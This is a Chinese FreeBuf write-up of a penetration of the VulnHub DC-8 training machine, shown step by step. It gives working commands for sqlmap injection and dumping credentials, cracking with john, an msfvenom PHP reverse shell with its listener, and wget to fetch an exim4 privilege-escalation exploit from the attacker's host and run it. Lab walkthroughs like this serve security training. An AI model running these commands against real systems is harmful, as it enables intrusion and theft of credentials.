VulnHub靶机 DC-8 打靶详细渗透过程 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
90
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

VulnHub靶机 DC-8 打靶详细渗透过程

rumilc 2024-04-27 18:44:48 86802

一、将靶机配置导入到虚拟机当中

靶机地址：

https://www.vulnhub.com/entry/dc-8,367/

二、渗透测试流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

arp-scan -l

端口扫描

nmap -p- 192.168.0.105

开放了80端口和22端口，详细探测一下服务信息

nmap -p80 -sV -A 192.168.0.105

探测一下指纹信息：

whatweb http://192.168.0.105

Web渗透

SQL注入

访问web界面，通过上述信息收集加插件，得到以下信息，采用Drupal CMS

点击左侧，发现url当中出现id参数变化，尝试sql注入

url：http://192.168.0.105/?nid=1

sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba --batch --dbs

当前数据库d7db，但不是dba

查看数据库当中的表信息，还有表中的内容

//爆数据表
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db --tables
//查看表中数据字段
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db -T users --columns
//爆字段数据
sqlmap -u "http://192.168.0.105/?nid=1" --random-agent --level 3 --risk 3 --current-db --is-dba -D d7db -T users -C "name,pass" --dump

d7db数据库当中的users数据表

d7db数据库当中的users数据表，查看表中字段内容

成功查询用户名和密码，将密码保存到记事本当中进行破解

登录后台

根据用户名当中提示信息john，使用john进行hash密码破解

将密码保存到文本文件当中，john破解即可

john 1.txt
//admin用户破解失败，john用户破解成功
//用户名和密码
john
turtle

dirsearch -u http://192.168.0.105/ -i 200

通过目录爆破后，成功找到后台并进入

成功进入后台

反弹shell

找到可代码执行的地方，或者可以输入代码的地方，尝试输入，保存即可。

这里还可以使用msf生成php反弹shell脚本，将代码放入其中即可

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=8888 -f raw

将代码放入其中

然后返回提交以后才能执行代码，msf开启监听即可接受到shell

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
exploit

成功接收shell，www-data普通权限

获取稳定shell，查看目录下有无有价值信息，发现没有

python -c "import pty;pty.spawn('/bin/bash')"

提权

查找系统下suid权限的命令

find / -perm -u=s -type f 2>/dev/null

查看一下exim4版本信息

搜索相关漏洞，进行利用

searchsploit exim 4

找到版本相近的问题

将其拷贝到本地，发现靶机有wget命令，那么可以通过wget进行下载，本地通过python开启一个http服务

//拷贝脚本
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /opt/exp.sh
//本地开启http服务
python -m http.server 8080

到靶机端进行下载exp.sh即可

wget http://192.168.0.106:8080/exp.sh

赋予执行权限，执行一下

chmod 755 exp.sh
./exp.sh
或bash exp.sh

查看源码，需要带参数

或者我们直接敲上 -h查看帮助的参数

./exp.sh -h

发现得加参数，依次尝试即可

./exp.sh -m setuid 失败
./exp.sh -m netcat

./exp.sh -m netcat 成功提权

思路：

主机发现---端口扫描---服务探针---指纹识别---发现注入点---web渗透SQL注入---获取用户名密码---登入后台---发现可加载PHP代码输入PHP代码---反弹shell---提权---exim4漏洞利用

# 渗透测试 # 网络安全 # web安全 # 漏洞分析 # 网络安全技术

免责声明

1.一般免责声明：本文所提供的技术信息仅供参考，不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》，作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明：文中技术内容可能不适用于所有情况或系统，在实际应用前请充分测试和评估。若因使用不当造成的任何问题，相关方不承担责任。

3. 更新声明：技术发展迅速，文章内容可能存在滞后性。读者需自行判断信息的时效性，因依据过时内容产生的后果，作者及发布平台不承担责任。

本文为 rumilc 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

VulnHub靶机 | 红队打靶

权限提升

WEB安全

展开更多

相关推荐

Apache Zeppelin命令执行漏洞深入分析及1Day PoC放漏原创

漏洞

锐捷天幕安全实验室

161291围观 · 2收藏 2024-04-29

[Meachines][Medium]Monitored 原创

Web安全

#Nagios #SQLI #Snmpwalk #npcd #nagiosxi

maptnh

61045围观 2024-04-29

一次简单的SRC漏洞挖掘原创

漏洞

本文记录在一次SRC挖掘过程中发现的用户枚举导致了敏感信息泄露以及水平越权。难度不大，分享一些漏洞挖掘的思路。

7Kinter

215785围观 · 11收藏 · 25喜欢 2024-04-28

M87 原创

其他

信息收集端口号服务版本22ssh80httpApache httpd 2.4.38 ((Debian))9090ssl/zeus-admin...

D3caDent

36420围观 2024-04-28

73% 中小企业安全人员容易错过或忽略关键安全警报

资讯

很多中小型企业和中型企业正面临着越来越多、越来越复杂的网络攻击威胁。更糟糕的是，很多公司缺乏足够的网络安全防御资源和专业知识。

小王斯基

87562围观 · 6喜欢 2024-04-28

rumilc LV.5

喜欢网络安全，热爱探索前沿技术！答案交给时间寻觅，未来不负时光所期！ CSDN:https://blog.csdn.net/rumil

27 文章数
38 关注者

内网渗透-隧道搭建&ssp隧道代理工具&frp内网穿透技术

2024-06-02

内网安全-隧道搭建&穿透上线&内网渗透-Linux上线-cs上线Linux主机

2024-05-28

VulnHub靶机 DC-9打靶渗透详细流程

2024-04-27

文章目录